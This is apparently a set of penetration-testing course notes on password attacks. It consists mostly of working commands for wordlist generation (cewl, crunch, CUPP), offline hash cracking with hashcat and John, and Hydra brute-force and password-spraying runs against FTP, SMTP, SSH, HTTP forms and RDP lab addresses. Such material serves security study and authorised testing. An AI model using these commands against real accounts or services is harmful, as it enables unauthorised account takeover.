Password Attacks

Lists of default passwords

Password Lists

Create custom lists

cewl -w list.txt -d 5 -m 5 http://company.com

-w will write the contents to a file. In this case, list.txt -m 5 gathers strings (words) that are 5 characters or more -d 5 is the depth level of web crawling/spidering (default 2)

Username Generator

git clone https://github.com/therodri2/username_generator.git

Keyspace Technique

crunch 2 2 01234abcd -o crunch.txt
crunch 6 6 -t pass%%

1: Creates a wordlist containing all possible combinations of 2 characters, including 0-4 and a-d 2: Adds two numbers to word "pass"

@ - lower case alpha characters , - upper case alpha characters % - numeric characters ^ - special characters including space

CUPP InteractiveMode: $ git clone https://github.com/Mebus/cupp.git $ python3 cupp.py

Identify hash: $ hashid f806fc5a2a0d5ba2471600758452799c $ hash-identifier f806fc5a2a0d5ba2471600758452799c

Crack Hashes offline: $ hashcat -a 0 -m 0 f806fc5a2a0d5ba2471600758452799c /usr/share/wordlists/rockyou.txt --show

-a 0 (Dictionary Attack) -m 0 (MD5 hash)

$ hashcat -a 3 ?d?d?d?d --stdout -a 3 (Brute-Force Attack) ?d?d?d?d (4 digits)

hashcat -a 3 ?d?d?d?d e48e13207341b6bffb7fb1622282247b --stdout

Rule-Based Attacks with John: $ john --wordlist=/tmp/list.txt --rules=best64 --stdout > /tmp/test.txt --wordlist= to specify the wordlist or dictionary file --rules to specify which rule or rules to use --stdout to print the output to the terminal

Add custom rules to /etc/john/john.conf [List.Rules:THM-Password-Attacks] Az"[0-9]" ^[!@#$]

"[0-9]" append a single digit (from 0 to 9) to the end of the word. For two digits, we can add "[0-9][0-9]" and so on.

^[!@#$] add a special character at the beginning of each word. ^ means the beginning of the line/word. Note, changing ^ to $ will append the special characters to the end of the line/word.

Attack Services with Hydra

Hydra dictionary attack against FTP

hydra -l ftp -P passlist.txt ftp://10.10.x.x $ hydra -l [email protected] -P /path/to/wordlist.txt smtp://10.10.x.x -v $ hydra -L users.lst -P /path/to/wordlist.txt ssh://10.10.x.x -v $ hydra -l admin -P 500-worst-passwords.txt 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f

Hydra Password Spraying

hydra -L usernames-list.txt -p Spring2021 ssh://10.1.1.10 $ python3 RDPassSpray.py -u victim -p Spring2021! -t 10.100.10.240:3026 https://github.com/xFreed0m/RDPassSpray

Outlook web access (OWA) portal tools

https://github.com/byt3bl33d3r/SprayingToolkit (atomizer.py)
https://github.com/dafthack/MailSniper

SMB tools

Metasploit (auxiliary/scanner/smb/smb_login)

PreviousLateral Movement NextHashcat

Last updated 2 years ago